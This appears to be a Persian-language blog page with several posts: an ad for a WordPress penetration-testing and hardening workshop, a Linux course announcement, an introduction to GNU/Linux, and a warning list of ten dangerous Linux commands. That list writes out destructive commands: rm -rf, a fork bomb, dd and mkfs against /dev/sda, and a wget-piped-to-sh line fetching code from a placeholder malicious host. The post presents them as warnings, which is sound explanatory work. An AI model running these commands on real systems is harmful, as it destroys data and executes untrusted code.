کارگاه تست نفوذ و ایمن سازی سایتهای وردپرسی

کارگاه تست نفوذ و ایمن سازی سایتهای وردپرسی

توضیحات:

بیش از ۳۰ درصد سایتهای ایرانی از وردپرس استفاده میکنند و اصولا طراحی سایتهای وردپرسی بدلیل ارزان تر بودن بازار گسترده تری دارد و به همین دلیل امنیت ساتهای وردپرسی نیز یک موضوع مهم برای صاحبان کسب و کارهای اینرنتی است.
پیاده سازی سایتهای تجاری و شرکتی و فروشگاهی مبتنی بر وردپرس و ووکامرس توجه جدی به امنیت آنها را میطلبد و این مهم نه فقط برای طراحان که برای توسعه دهندگان و صاحبان سایتها نیز ضروری است.
در دوره آموزشی ۱۰ ساعتی “تست نفوذ و ایمن سازی سایتهای وردپرسی” شما روشهای تست و اندازه گیری امنیت وردپرس و همچنین روشهای ایمن سازی آن را بطور عملی فراخواهید گرفت.

مدرس دوره کیست؟

 داریوش اسماعیلی مدرس دانشگاه و مشاور کسب کار با بیش از ۲۰ سال سابقه حرفه ای در داخل و خارج از کشور و دارای عناوین مختلف بین المللی در سرممیزی امنیت اطلاعات و تست نفوذ و سایر دوره های تخصصی امنیت و همچنین دانش و تجربه پیاده سازی ده ها سایت تجاری و فروشگاهی میتواند یکی از بهترین گزینه های آموزش اصول امنیت و پیاده سازی آن در سایتها باشد. سوابق درخشان ایشان در سایت شخصی و شبکه های اجتماعی و کانال های آموزشی قابل بررسی و استعلام است.
میتوانید برخی ویدئوهای ایشان را در دنبال فرمایید:

www.Esmaeely.ir
https://aparat.com/dresmaeely
https://instagram.com/dr_esmaeely

سرفصل های اموزش امنیت وردپرس
برای اینکه اموزش امنیت وردپرس برای مبتدیان و افراد نیمه حرفه ای هم سودمند باشد، با ساده ترین زبان و سطح آموزشی مطالب تدریس خواهند شد.
این دوره آموزشی بصورت کارگاه عملی ۱ روزه از ساعت ۹ الی ۱۹ در روز ۱۷ اسفند ماه برگزار میشود و شرح موارد آموزشی به صورت زیر است:


مبحث اول: 
معرفی کوتاهی از دنیای وردپرس و مسیر آموزش
معرفی مخاطرات وتهدیدهای وب سایت ها
اموزش کامل پشتیبان گیری کاملا خودکار از تمام اطلاعات سایت با افزونه و  Cpanel
به روز نگه داشتن وردپرس


مبحث دوم :
انواع حملاتی که بر علیه رمز عبور امکان پذیر است

تغییر و بازیابی رمزعبور در مواقع خاص
تست امنیت رمز عبور

ایمن سازی رمزهای عبور
امن ساختن صفحه ورود وردپرس


مبحث سوم :
محافظت از فایل پیکربندی وردپرس
جلوگیری از Directory List و Directory Indexing
حذف شماره نسخه وردپرس
غیرفعال کردن نمایش خطاها


مبحث چهارم :
مبارزه با اسپمرها در قسمت نظرات
جلوگیری از بات ها و دسترسی های غیرمجاز
پیاده سازی یک فایروال قوی توسط افزونه و یا بدون آن


مبحث پنجم:
بررسی تشخیص هک شدن سایت
انتخاب یک هاست مناسب
آموزش افزونه امنیتی wordfence
 

مبحث ششم:

امنیت پایگاه های داده و دیتابیس سایت

افزایش امنیت وردپرس با تغییر پیشوند پیش فرض پایگاه داده

مبحث هفتم
:

تست نفوذ سایت با ابزارهای امنیتی
تست نفوذ و بررسی سایت با کالی لینوکس
بررسی و گزارش آسیب پذیری ها
سایر موارد

پذیرایی و میان و عده ؛ نهار
 لوح فشرده برنامه ها و مستندات

برای ثبت نام میتوانید از صفحه رویداد در ایوند به آدرس زیر استفاده کنید:
https://evand.com/events/wordpresssecurity

و یا مستقیما از اینجا ثبت نام کنید:

لطفا این مطلب را برای دوستان خود ارسال کنید

دوره لینوکس در فست آموز

دوره لینوکس در فست آموز

همکاری آموزشی بنده به فست آموز (Fastamooz.com) شروع شد!
دوره “مهاجرت به لینوکس” بر اساس استاندارد LPIC1.
معرفی فیلم را ببینید و ثبت نام کنید تا ۵۰ هزار تومان هدیه بگیرید.

دوره های مختلفی را در این سامانه آموزش خواهم داد.

 

لطفا این مطلب را برای دوستان خود ارسال کنید

۱۰ فرمان خطرناک لینوکسی!

۱۰ فرمان خطرناک لینوکسی!

همانطور که در مطالب پیشین گفته شد ، گنو لینوکس یکی از سیستهای عامل متفاوت و پایدار در امنیت و شبکه است.
بیش از ۳۰۰۰ فرمان در لینوکس وجود دارد که تقریبا هرکاری را که بخواهیم انجام میدهند! اما همیشه این فرمان ها امن نیستند.
در این نوشته به بررسی برخی فرمانهای خطرناک لینوکس میپردازیم که کاربران باید با دقت بیشتری به آن توجه کنند.

۱٫ rm -rf

این فرمان سریعترین راه حذف فولدرها و محتویات درون آنها است. خیلی دقت کنید که پارامتر rf یعنی بدون هیچ سئوالی تمام فایلها و فولدرها حذف شوند!!

۲٫ :(){:|:&};:

این فرمان عجیب و غریب ، یک بمب فراخوان سیستمی یا Fork Bomb است.اگر در محیط ترمینال اجرا شود با فراخوانی پی در پی خودش موجب از کار افتادن سیستم عامل خواهد شد…

۳٫ mv folder /dev/null

فرمان mv برای انتقال فایلها و فولدرها است و مسیر /dev/null یک مسیر مخصوص برای در نظر نگرفتن گزارشات و خروجی هاست.اگر در فرمان mv هدف یا مقصد را برابر با null قرار دهیم ؛ تمام فایلهای انتقالی را به چاله سیاه یا blackhole فرستاده ایم!!!

۴٫ command > /dev/sda

بلاک /dev/sda یعنی هارد دیسک.فرمان بالا خطی از داده ها را به سمت بلاک مقصد میفرستد و این یعنی از بین رفتن داده های روی بلاک یا هارد دیسک….

۵٫ wget http://malicios_source -0- |sh

فرمان wget میتواند یک اسکریپت یا بد افزار را دانلود و مستقیما به خط فرمان یا shell بفرستد و آن را اجرا کند…

۶٫ mkfs.ext3 /dev/sda

این فرمان بلاک SDA یا همان هارد دیسک را فورمت خواهد کرد…یعنی کل پارتیشن ها و داده های آنها نابود خواهد شد و قابل بازیابی هم نیست…

۷٫ > file

محتوای یک فایل را بطور کامل حذف خواهد کرد…

۸٫ ^foo^bar

یکی از خطرناک ترین فرامین ، میتواند هر فرمانی را به هر فرمانی تبدیل کند… مثلا ls^rm -rf^ فرمان لیست گیری را تبدیل به نابود کننده میکند…

۹٫ dd if=/dev/random of=/dev/sda

این فرمان تمام داده های هارد دیسک را با اطلاعاتی تصادفی پر میکند که در نتیجه اطلاعات هارد دیسک نابود میشود و غیر قابل بازیابی است…

۱۰٫ Hidden the Command

فرامین مخفی ، میتوان فرامین را در قالب hex بصورتی پنهانی در ترمینال اجرا کرد و …

 

این نوشته ترجمه و البته همراه با توضیح و اصلاحاتی بود از مطلب ۱۰ Most Dangerous Commands.

لطفا این مطلب را برای دوستان خود ارسال کنید

گنو لینوکس چیست؟

گنو لینوکس چیست؟

لینوکس یا بهتر است بگوییم “گنو/لینوکس” همانند ویندوز و مک و نظایر آنها ، از سیستم های عامل برتر جهان است.
لینوکس در سال ۱۹۹۱ توسط آقای لینیوس توروالدز دانشجوی هکر فنلاندی نوشته شد و در ادامه انقلابی به نام انقلاب متن باز یا Open Source Revelation باعث معرفی این سیستم عامل قدرتمند به دنیا گردید.(دیدن فیلم انقلاب اوپن سورس را توصیه میکنم).

گنو لینوکس هسته با بیش از ۱۵۰۰ توزیع متفاوت (میتوانید در سایت distrowatch تمام توزیع های آن را ببینید یا دانلود کنید) برای هر کاری نسخه ای ویژه دارد. برای کاربران خانگی ؛ اداری ؛ امنیت کاران، گرافیست ها ، گیمیرها  ؛ شبکه کاران و…. ؛ حتی برای کودکان نیز توزیع هایی را در نظر گرفته است.

اهمیت لینوکس در این است که شرکتهای بزرگی همچون گوگل و یاهو و حتی مایکروسافت از سرورهای لینوکسی بهره میبرند.حتی اپل نیز از توزیع های یونیکسی که لینوکس هم از آن بوجود آمده است استفاده میکنند.تقریبا تمام متخصصین امنیتی و شبکه کاران از توزیع های مختلف لینوکسی بهره میبرند.

گنو چیست؟ این مطلب از ویکی پدیا قابل مطالعه است:

برای دیگر کاربردها، گنو (ابهام‌زدایی) را ببینید.
سیستم‌عامل گنو در سال ۱۹۸۳ با هدف ایجاد یک سیستم‌عامل کامل و آزاد شبه-یونیکس به‌وسیله ریچارد استالمن پایه‌گذاری شد. GNU مخفف بازگشتی «GNU’s Not Unix» است.
پروژه گنو در سال ۱۹۸۴ با هدف پشتیبانی و تولید نرم‌افزار آزاد برای سیستم‌عامل گنو تأسیس شد.
بنیاد نرم‌افزار آزاد در سال ۱۹۸۵ با هدف حمایت از جنبش نرم‌افزار آزاد و به ویژه پروژهٔ گنو شروع به کار کرد.
امروزه مهم‌ترین و رایج‌ترین سیستم‌عاملی که از نرم‌افزارهای پروژه گنو و پروانه GNU GPL استفاده می‌کند، لینوکس است که از کرنل لینوکس استفاده می‌کند و به شکل توزیع لینوکس عرضه می‌شود که بعضی اشخاص به آن «گنو/لینوکس» می‌گویند. (بحث نامگذاری لینوکس)

فرق لینوکس با ویندوز چیست (خواندن این مقاله را پیشنهاد میکنم)؟
بطور کلی پایداری و سرعت و امنیت لینوکس بالا است. با سخت افزارها سازگاری بیشتری دارد و کار به آن نیز حرفه ای تر است.
در این مقاله معرفی مختصری از “گنو/لینوکس” را تقدیمتان کردم و در نوشته های بعدی توضیحات فنی تر و بیشتری در این باره خواهم داد.
همین امروز لینوکس را یاد بگیرید! راستی من دوره های آموزشی لینوکس را هم دارم که برایتان معرفی خواهم کرد.
لطفا این مطلب را برای دوستان خود ارسال کنید